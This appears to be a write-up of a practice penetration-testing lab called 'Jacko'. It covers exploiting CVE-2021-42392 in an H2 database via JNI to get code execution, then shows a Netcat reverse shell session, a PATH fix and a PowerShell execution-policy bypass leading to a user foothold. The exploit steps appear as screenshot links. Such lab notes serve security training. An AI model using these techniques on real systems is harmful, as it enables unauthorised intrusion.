JNI Code Execution
The target H2 instance has been identified to be vulnerable to CVE-2021-42392
/Practice/Jacko/3-Exploitation/attachments/{0F982BAE-B762-45EE-909B-7878EAC41A0B}.png)
/Practice/Jacko/3-Exploitation/attachments/{8A11A207-2592-44CF-AC53-8C0553EB342D}.png)
Creating a native library to C:\Windows\Temp\JNIScriptEngine.dll
/Practice/Jacko/3-Exploitation/attachments/{927F20AE-3DE7-404B-ACA4-E93D11342855}.png)
Loading the newly created native library
/Practice/Jacko/3-Exploitation/attachments/{D3C074FE-3205-4F8A-8507-B00FA9E972DB}.png)
Code execution confirmed
Exploitation
/Practice/Jacko/3-Exploitation/attachments/{FCB2BD3A-1913-4B02-A7E6-E71075235FA8}.png)
/Practice/Jacko/3-Exploitation/attachments/{C05EF2A5-4195-465A-B5DE-00D995429143}.png)
Delivering Netcat binary
Directory needed to be escaped(\\)
/Practice/Jacko/3-Exploitation/attachments/{801F2EAD-DAD2-4B40-9126-2F82BB237A34}.png)
Spawning a reverse shell with the Netcat binary
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/jacko]
└─$ nnc 445
listening on [any] 445 ...
connect to [192.168.45.192] from (UNKNOWN) [192.168.236.66] 50301
Microsoft Windows [Version 10.0.18363.836]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Program Files (x86)\H2\service> whoami
whoami
'whoami' is not recognized as an internal or external command,
operable program or batch file.
C:\Program Files (x86)\H2\service>hostname
hostname
'hostname' is not recognized as an internal or external command,
operable program or batch file.
C:\Program Files (x86)\H2\service>ipconfig
ipconfig
'ipconfig' is not recognized as an internal or external command,
operable program or batch file.Got the call back but commands don’t work Likely due to missing PATH variables
Environment Fix
C:\Program Files (x86)\H2\service> echo %PATH%
C:\Users\tony\AppData\Local\Microsoft\WindowsApps;However, it appears there’s an issue with the shell environment — commands are not executing as expected. This suggests that the environment may not be properly configured for the service account (tony). The current PATH variable seems incomplete, containing only the WindowsApps directory, which is insufficient for running most commands. It’s likely that the necessary environment variables or system paths are not set up for this account, or the service itself is not correctly configured to run under tony with the appropriate environment.
C:\Program Files (x86)\H2\service> set PATH=%PATH%;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;Setting the %PATH% variable manually
C:\Program Files (x86)\H2\service> powershell -ep bypass
powershell -ep bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6
PS C:\Program Files (x86)\H2\service> whoami
whoami
jacko\tony
PS C:\Program Files (x86)\H2\service> hostname
hostname
jacko
PS C:\Program Files (x86)\H2\service> ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.236.66
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.236.254Initial Foothold established to the target system as the tony user via exploiting CVE-2021-42392